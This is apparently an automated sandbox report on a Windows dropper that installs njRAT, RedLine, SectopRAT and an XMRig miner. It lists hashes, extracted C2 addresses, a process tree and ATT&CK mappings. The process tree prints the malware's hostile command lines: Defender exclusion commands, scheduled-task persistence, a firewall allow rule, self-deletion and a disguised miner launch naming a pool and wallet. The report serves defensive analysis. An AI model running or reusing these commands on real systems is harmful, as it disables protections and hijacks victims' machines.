Overview

overview

10

Static

static

3

ff8addf2b8...6f.exe

windows7-x64

10

ff8addf2b8...6f.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    149s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    08-11-2024 13:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe

  • Size

    2.9MB

  • MD5

    01fc40917e3e56267e23bbcc3225d6d0

  • SHA1

    68a8782da431eddcf7ad88699580a7f034fffbe7

  • SHA256

    ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f

  • SHA512

    33d394bc795b96f815d47df8a382d720bfbb8b2d5e9288c868d83ff25712cd32737f1bf868f9ba238e72112b0cc425af538d3bc226267b38213fb364998b344c

  • SSDEEP

    49152:cu3XPRmBGiOoYcCeQE7Wq58ctIgktXub5PnyzMezAvKjGM76bfvgAz3:NXPR5JCyq5ptktgdn2RAvKjV767vgAz

Score
10/10
njratredlinesectopratxmrig544363603hackeddiscoveryevasionexecutioninfostealerminerpersistenceprivilege_escalationratthemidatrojan

Malware Config

Extracted

Family

njrat

Version

im523

Botnet

HacKed

C2

91.193.4.201:58287

Mutex

344a7b760874a7de0ff245bf58f8fa0d

Attributes
  • reg_key

    344a7b760874a7de0ff245bf58f8fa0d

  • splitter

    |'|'|

Extracted

Family

redline

Botnet

544363603

C2

91.142.79.35:13400

Signatures

  • Njrat family
    njrat
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine payload 2 IoCs
  • Redline family
    redline
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

    trojanratsectoprat
  • SectopRAT payload 2 IoCs
  • Sectoprat family
    sectoprat
  • Xmrig family
    xmrig
  • njRAT/Bladabindi

    Widely used RAT written in .NET.

    trojannjrat
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
    evasion
  • XMRig Miner payload 11 IoCs
    miner
  • Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Modifies Windows Firewall 2 TTPs 1 IoCs
    evasion
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 10 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Drops startup file 2 IoCs
  • Executes dropped EXE 13 IoCs
  • Themida packer 8 IoCs

    Detects Themida, an advanced Windows software protection system.

    themida
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    evasiontrojan
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
  • Drops autorun.inf file 1 TTPs 5 IoCs

    Malware can abuse Windows Autorun to spread further via attached volumes.

  • Drops file in System32 directory 9 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe
    "C:\Users\Admin\AppData\Local\Temp\ff8addf2b89de210fa350138a30eaa67a5772f59dcd0480ffc9d339e7cdd266f.exe"
    1⤵
    • Checks computer location settings
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2028
    • C:\Users\Admin\AppData\Roaming\BittyHack.exe
      "C:\Users\Admin\AppData\Roaming\BittyHack.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Executes dropped EXE
      • Checks whether UAC is enabled
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of AdjustPrivilegeToken
      PID:2772
    • C:\Users\Admin\AppData\Roaming\WindowsHost.exe
      "C:\Users\Admin\AppData\Roaming\WindowsHost.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2544
      • C:\Users\Admin\AppData\Roaming\WinUpdates.exe
        "C:\Users\Admin\AppData\Roaming\WinUpdates.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:4140
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1440
          • C:\Windows\system32\schtasks.exe
            schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
            5⤵
            • Scheduled Task/Job: Scheduled Task
            PID:4812
        • C:\Windows\system32\services64.exe
          "C:\Windows\system32\services64.exe"
          4⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Drops file in System32 directory
          • Suspicious use of SetThreadContext
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4280
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
            5⤵
              PID:2964
              • C:\Windows\system32\schtasks.exe
                schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
                6⤵
                • Scheduled Task/Job: Scheduled Task
                PID:708
            • C:\Windows\system32\Microsoft\Libs\sihost64.exe
              "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
              5⤵
              • Executes dropped EXE
              PID:1308
            • C:\Windows\System32\svchost.exe
              C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=467cijEdKaagF8BDuU34TjMYk82LvhFozMctKetFMtaU8TYBejNKLbbMb3PbANBpZ97XjkJjzQJbyX9BdU5CmPRX3CUC8dU --pass=123 --cpu-max-threads-hint=60 --cinit-remote-config="tHg/Fec4JaWoq3ZRb8ABB9AEzMGpzWZtTQtnnclZnhc=" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56GQTOYuXRCBeyb5NYlmdCuiwuvmEFRE3FUoytGa2xDRKVyTGVqBRZ3YvrseaWnYy0OhLuczKVxfo8Wo33kvDh26CIpmy6+bf50YCXxhpkDvay12RqWFwTrEWzJDjMOFSbV4qSudJZDKeejGmt2wAsK4zZ9lj0F0NMeagNs9oiluuddfhHuwfN3JDOsm7vnmpSFDvtwzZIXsZWyWN624JxJsSIqBQxfKrcCnHvRx/k2yLSlvxLvum+3cwztr7Zb0wO7EEWrafJMkNolCTGr1RQK9klv+u1q+LOMUOW+Y1mA+ZjeC+aSi9qmt59ZMlAX42foDzL1w8qyVjl6rfhEF/2bTP0YCyKockkTlSVngGY/1F1T5EOo9DhmrxyNy9y8mJqRKYUIcpgNI5Y4F/BBh3W0pw0+6w6pKB/o2s/ADQ0m7f1mIWwiXrj/GHg6M2kw4tg4mnBGVnha642JDqV8iaYphm4FpsNVwyEeLSXd18Mjr+kd9fvE08ohpB15bbg+6JPSeWISk8CHiep3TzEvyvZ+5XcHZVh1iXXZwlYO+wW5wxnobnzBzuj6f/BZ2txWK+7m4Cgd8mjMym7jJ/vKH1WIDSz05jpx4+wkdqzn3YIdvl2S8Luc4rG0CJXqJOdwbYOBrAey4VzJk8E8cY9tmMr5hpjLcfmu59CVDYVbbFFkb9zLoOp89XSPAN5hEW0HK5dw==" --cinit-idle-wait=1 --cinit-idle-cpu=80 --tls --cinit-stealth
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1816
        • C:\Users\Admin\AppData\Roaming\Explorer.exe
          "C:\Users\Admin\AppData\Roaming\Explorer.exe"
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:4408
          • C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe
            "C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe"
            4⤵
            • Checks computer location settings
            • Executes dropped EXE
            • Suspicious use of WriteProcessMemory
            PID:4416
            • C:\Windows\SYSTEM32\cmd.exe
              "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:2928
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:1512
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:3672
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:4144
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                6⤵
                • Command and Scripting Interpreter: PowerShell
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                PID:2684
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe"
              5⤵
              • Suspicious use of WriteProcessMemory
              PID:4628
              • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe"
                6⤵
                • Checks computer location settings
                • Executes dropped EXE
                • Drops file in System32 directory
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:4296
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                  7⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3000
                  • C:\Windows\system32\schtasks.exe
                    schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                    8⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:704
                • C:\Windows\system32\services32.exe
                  "C:\Windows\system32\services32.exe"
                  7⤵
                  • Checks computer location settings
                  • Executes dropped EXE
                  • Suspicious use of WriteProcessMemory
                  PID:3768
                  • C:\Windows\system32\cmd.exe
                    "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
                    8⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2640
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:2736
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4320
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:432
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                      9⤵
                      • Command and Scripting Interpreter: PowerShell
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1920
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                    8⤵
                      PID:2632
                      • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                        C:\Users\Admin\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\services32.exe"
                        9⤵
                        • Checks computer location settings
                        • Executes dropped EXE
                        • Drops file in System32 directory
                        • Suspicious use of AdjustPrivilegeToken
                        PID:1116
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"' & exit
                          10⤵
                            PID:4336
                            • C:\Windows\system32\schtasks.exe
                              schtasks /create /f /sc onlogon /rl highest /tn "services32" /tr '"C:\Windows\system32\services32.exe"'
                              11⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:4960
                          • C:\Windows\system32\Microsoft\Telemetry\sihost32.exe
                            "C:\Windows\system32\Microsoft\Telemetry\sihost32.exe"
                            10⤵
                            • Executes dropped EXE
                            PID:2348
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                            10⤵
                              PID:1664
                              • C:\Windows\system32\choice.exe
                                choice /C Y /N /D Y /T 3
                                11⤵
                                  PID:2852
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost32.exe"
                          7⤵
                          • Suspicious use of WriteProcessMemory
                          PID:4008
                          • C:\Windows\system32\choice.exe
                            choice /C Y /N /D Y /T 3
                            8⤵
                              PID:3964
                    • C:\Users\Admin\AppData\Roaming\Win10.exe
                      "C:\Users\Admin\AppData\Roaming\Win10.exe"
                      4⤵
                      • Checks computer location settings
                      • Executes dropped EXE
                      • System Location Discovery: System Language Discovery
                      • Suspicious use of WriteProcessMemory
                      PID:4960
                      • C:\Users\Admin\AppData\Local\Temp\sys32.exe
                        "C:\Users\Admin\AppData\Local\Temp\sys32.exe"
                        5⤵
                        • Drops startup file
                        • Executes dropped EXE
                        • Adds Run key to start application
                        • Drops autorun.inf file
                        • System Location Discovery: System Language Discovery
                        • Suspicious behavior: EnumeratesProcesses
                        • Suspicious behavior: GetForegroundWindowSpam
                        • Suspicious use of AdjustPrivilegeToken
                        • Suspicious use of WriteProcessMemory
                        PID:2332
                        • C:\Windows\SysWOW64\netsh.exe
                          netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\sys32.exe" "sys32.exe" ENABLE
                          6⤵
                          • Modifies Windows Firewall
                          • Event Triggered Execution: Netsh Helper DLL
                          • System Location Discovery: System Language Discovery
                          PID:4052

              Network

              MITRE ATT&CK Enterprise v15

              Reconnaissance

              Resource Development

              Initial Access

              Replication Through Removable Media

              1
              T1091

              Execution

              Command and Scripting Interpreter

              1
              T1059

              PowerShell

              1
              T1059.001

              Scheduled Task/Job

              1
              T1053

              Scheduled Task

              1
              T1053.005

              Persistence

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Create or Modify System Process

              1
              T1543

              Windows Service

              1
              T1543.003

              Event Triggered Execution

              1
              T1546

              Netsh Helper DLL

              1
              T1546.007

              Scheduled Task/Job

              1
              T1053

              Scheduled Task

              1
              T1053.005

              Privilege Escalation

              Boot or Logon Autostart Execution

              1
              T1547

              Registry Run Keys / Startup Folder

              1
              T1547.001

              Create or Modify System Process

              1
              T1543

              Windows Service

              1
              T1543.003

              Event Triggered Execution

              1
              T1546

              Netsh Helper DLL

              1
              T1546.007

              Scheduled Task/Job

              1
              T1053

              Scheduled Task

              1
              T1053.005

              Defense Evasion

              Impair Defenses

              1
              T1562

              Disable or Modify System Firewall

              1
              T1562.004

              Modify Registry

              1
              T1112

              Virtualization/Sandbox Evasion

              1
              T1497

              Credential Access

              Discovery

              Query Registry

              4
              T1012

              System Information Discovery

              4
              T1082

              System Location Discovery

              1
              T1614

              System Language Discovery

              1
              T1614.001

              Virtualization/Sandbox Evasion

              1
              T1497

              Lateral Movement

              Replication Through Removable Media

              1
              T1091

              Collection

              Command and Control

              Web Service

              1
              T1102

              Exfiltration

              Impact

              Replay Monitor

              Loading Replay Monitor...

              Downloads

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                Filesize

                2KB

                MD5

                440cb38dbee06645cc8b74d51f6e5f71

                SHA1

                d7e61da91dc4502e9ae83281b88c1e48584edb7c

                SHA256

                8ef7a682dfd99ff5b7e9de0e1be43f0016d68695a43c33c028af2635cc15ecfe

                SHA512

                3aab19578535e6ba0f6beb5690c87d970292100704209d2dcebddcdd46c6bead27588ef5d98729bfd50606a54cc1edf608b3d15bef42c13b9982aaaf15de7fd6

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost32.exe.log
                Filesize

                539B

                MD5

                b245679121623b152bea5562c173ba11

                SHA1

                47cb7fc4cf67e29a87016a7308cdb8b1b4dc8e3d

                SHA256

                73d84fd03e38f1bbf8b2218f8a454f0879051855252fc76b63f20f46e7fd877f

                SHA512

                75e46843b1eafcc7dc4362630838895b7f399e57662a12bf0305a912c8e726b02e0a760b1b97a2c262b2d05fdb944b9ed81c338ad93e5eb5cb57bc651602e42c

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                566e5ddd60b501af160cb218243fcc89

                SHA1

                d99743fe6c8af4c61b2da839d6d0f0a17c097a34

                SHA256

                fcd8f03f9461154414f8e82888e0fbba60229d5a659557aee20cf56cc59894e3

                SHA512

                3aaddd0c8259b793b0cdfa643fd4344892078d027ae9c38cc6c2ff0d7c5476afc3bfc4e6a03922a49eea2e5661a3f4759eb4d566cb89a72c33f9f584e30ba10a

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                eb033be02578f9635ec47bdc1de5c3fb

                SHA1

                ec356bc87381354a06baa9c30e8c3ac3d30e0f6f

                SHA256

                bd827af3192bf83c75a32e51ed2de83bd3b90d6b99350721a189a57cec15d063

                SHA512

                4d8778503646f7016df73ff9d204760f4fe4d2b24157920ac3e5651653373975b2f2d229530143059f11b16c42822ad7963e628ad6066022ee712c17d90595ed

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                98baf5117c4fcec1692067d200c58ab3

                SHA1

                5b33a57b72141e7508b615e17fb621612cb8e390

                SHA256

                30bf8496e9a08f4fdfe4767abcd565f92b6da06ca1c7823a70cb7cab16262e51

                SHA512

                344a70bfc037d54176f12db91f05bf4295bb587a5062fd1febe6f52853571170bd8ef6042cb87b893185bbae1937cf77b679d7970f8cc1c2666b0b7c1b32987d

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                4ff4fd481c9b346992fcbb86e534c039

                SHA1

                784344362009eb6029a7e58792e757f82e6e1564

                SHA256

                b9102c8b1e1b4ef3e0b2c7d81fdc330476d5805dd6fdc00924ef0ceebaa7d0de

                SHA512

                708e2f7a3b505269f4da6e45b7704779439f4a7b21abfce374c41b513907566940c9ca174b175465e678b841509ae00dedc6e8ce8dc7c9613becc6f214bec668

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                15dde0683cd1ca19785d7262f554ba93

                SHA1

                d039c577e438546d10ac64837b05da480d06bf69

                SHA256

                d6fa39eab7ee36f44dc3f9f2839d098433db95c1eba924e4bcf4e5c0d268d961

                SHA512

                57c0e1b87bc1c136f0d39f3ce64bb8f8274a0491e4ca6e45e5c7f9070aa9d9370c6f590ce37cd600b252df2638d870205249a514c43245ca7ed49017024a4672

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                da5c82b0e070047f7377042d08093ff4

                SHA1

                89d05987cd60828cca516c5c40c18935c35e8bd3

                SHA256

                77a94ef8c4258445d538a6006ffadb05afdf888f6f044e1e5466b981a07f16c5

                SHA512

                7360311a3c97b73dd3f6d7179cd979e0e20d69f380d38292447e17e369087d9dd5acb66cd0cbdd95ac4bfb16e5a1b86825f835a8d45b14ea9812102cff59704b

                Download Submit

              • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                Filesize

                944B

                MD5

                8ac417cf4c6b9975e75ecb3830a8a682

                SHA1

                40478daa97501ce3bccc287a74aa249ec082e252

                SHA256

                cf31af106ed5a03da23c5d25f97c99526d07d1053e14d25967c6ad3eb32b32b9

                SHA512

                8db7d3885c4c9bdbbfcca97d2ca651de4a0286bc14023582c6deca6f6c509882c25619b67bd9e6993b3b9090a54fd0b2a7d542edd976c0582a3785bfeffb577f

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lcud2ghg.zlf.ps1
                Filesize

                60B

                MD5

                d17fe0a3f47be24a6453e9ef58c94641

                SHA1

                6ab83620379fc69f80c0242105ddffd7d98d5d9d

                SHA256

                96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                SHA512

                5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                Download Submit

              • C:\Users\Admin\AppData\Local\Temp\svchost32.exe
                Filesize

                25KB

                MD5

                0c0a17b9ae220d337693c257a74031d4

                SHA1

                970f54dd9c02a3fd5e242f62d98a00779ebc1aee

                SHA256

                50acbb9a157e979f08fe1bfd920a2c6d0385bd3f0aee4c4865ecad555c06defa

                SHA512

                ac0076f94bffd774a9c8d30e5e1ee74b0b46cec12ee3fd4b5e1a0fc8e638eb3cb1349ac30e4a0fce2281bba7421fc50ff2bc5d6987a50116716e96e0c19f9c49

                Download Submit

              • C:\Users\Admin\AppData\Roaming\BittyHack.exe
                Filesize

                2.7MB

                MD5

                b11d0aa406489018391c281d5bc7f64d

                SHA1

                1959bb5279bdf14998d40e69e370d3dc4bd10fcc

                SHA256

                9789f312707fa3ab30aea641abbca424b27abb8043221c335247c958c52fc449

                SHA512

                d9787391662b5643382a9d10ffe01d74a28f49580586bedec4f67dd7eb1fd8a2d74e1e1735bcb0e91c2bfc9babd6de968d07c9a203746d5d5e51db7547f95f68

                Download Submit

              • C:\Users\Admin\AppData\Roaming\Explorer.exe
                Filesize

                66KB

                MD5

                52404bfacf116c18911d577b06b4caae

                SHA1

                baa105e8d868d345a10d8824c2ce0b74c0dd6547

                SHA256

                e3fd5c1710b4cbfe3954a2e6b68b3060ebcdb38eca23dfaec2d183b917336445

                SHA512

                b3bcfada74ef97def3b6298d5ba85505bd01792d6a3f277a59883aa23fcafd13f286f5919616ab0da43bbc8cbe88916fe5425b00bd0c4c349ad422a8b38be4be

                Download Submit

              • C:\Users\Admin\AppData\Roaming\Win10.exe
                Filesize

                37KB

                MD5

                929bf03d3683885aa9563f1409c1a952

                SHA1

                38a241f8146a00bf9643599689cff8d4d1500c0b

                SHA256

                5750d2673d5761d8a9682c326520ef2d4a5a18099dfd28a66b3a0ee5c0103a39

                SHA512

                9f0afc7fbda30fd82cd45aefdfbb3174c68047b2814c94c4191f2a12944e164dbd4d6b6f293cb2e94933df152ece30ee24a31cd67c90a781e8a7d248e3757023

                Download Submit

              • C:\Users\Admin\AppData\Roaming\WinUpdates.exe
                Filesize

                43KB

                MD5

                92028f98bfbb9b4db77a212f74ba6d54

                SHA1

                a282dbcf99a67e11d83a215f8d36793fc9bca979

                SHA256

                f55537eae7103d810796940652bc773cde36f28de6430fc9e3913404bfc319d2

                SHA512

                e37efd800e7fc6b3fbad1b604c177bcc69925d294ad79eda3951a0e5a3c819609a8e268a09db613cde3b2f9d59d0845ba9a8829298a776737b35ffb96f120d42

                Download Submit

              • C:\Users\Admin\AppData\Roaming\WindowsCrashHandler.exe
                Filesize

                32KB

                MD5

                c4a9e3f79e55227fa8544d08e502f1a8

                SHA1

                fb8090265164991e1e3a98e09a4d4f8795516dae

                SHA256

                c7421524f43f2c3292f68ffde94e3b78284493a3e43d66a5062f2c0826eff120

                SHA512

                057abcbc6f84bba7d3425866dd8606387322f7351b396dd0dc48c513dab77d7662681aed8ab7bfe65074771507c72cc9b78f5b00a875dd7880495826f3264a5b

                Download Submit

              • C:\Users\Admin\AppData\Roaming\WindowsHost.exe
                Filesize

                168KB

                MD5

                58cd65979ea6a99f2e0ea173c8337731

                SHA1

                5b4a2d5a36697aa214717786eb04b3cd494d5c54

                SHA256

                7e92ea343aaecf6a5e62dee72ec3dc93c48158781e55538d2e346ae5f30489d4

                SHA512

                d63982207cdd9d094c66db9ff9a1d08285f9f04e7053cb2f33675b12ab2bc97f1291564e84852aed1067a097322213323a601497addb3fd0d7602f57d3916e84

                Download Submit

              • C:\Windows\System32\Microsoft\Libs\sihost64.exe
                Filesize

                7KB

                MD5

                4d4f293bfa7b5943bb487ce57875c67d

                SHA1

                52a0cf3d23291d4bc7a9ff13ff59333b024d7ea7

                SHA256

                a27ff2a2e0ecf8cbb77a3fedf293ee7b552696dba33fba01402758dec3a544c1

                SHA512

                c3f7360e97bd060b713fdede7977ad60f0dd32e4180a954b0a576223719ee24bb2896429949990263cade7f1d47ab6434668cff816b46fad0a13db34d74037e2

                Download Submit

              • C:\Windows\System32\Microsoft\Telemetry\sihost32.exe
                Filesize

                8KB

                MD5

                1cd58eb4ab60df57796ca644b7a7236b

                SHA1

                e1cac63b2ef39bee0a24b73c16d723897a1c4355

                SHA256

                224c48cf2b88a912a4166c340508acf2f7a59066bf0ec80b5ccc0ca720ba0885

                SHA512

                17f0c49768f5cae80f4f08f9f57e922026c0b64c7bf2568574dc0e35e7ca9db9f8cbd0da4537dbc313f80d006733333a7b1caaf7c938fbc1acaf2018068bbbc9

                Download Submit

              • memory/1308-246-0x0000000000B40000-0x0000000000B46000-memory.dmp

                Filesize

                24KB

                Download

              • memory/1512-84-0x000001B69E240000-0x000001B69E262000-memory.dmp

                Filesize

                136KB

                Download

              • memory/1816-268-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

                Download

              • memory/1816-271-0x0000021CF4EB0000-0x0000021CF4ED0000-memory.dmp

                Filesize

                128KB

                Download

              • memory/1816-273-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

                Download

              • memory/1816-274-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

                Download

              • memory/1816-275-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

                Download

              • memory/1816-276-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

                Download

              • memory/1816-272-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

                Download

              • memory/1816-280-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

                Download

              • memory/1816-270-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

                7.5MB

                Download

              • memory/1816-278-0x0000000140000000-0x0000000140786000-memory.dmp

                Filesize

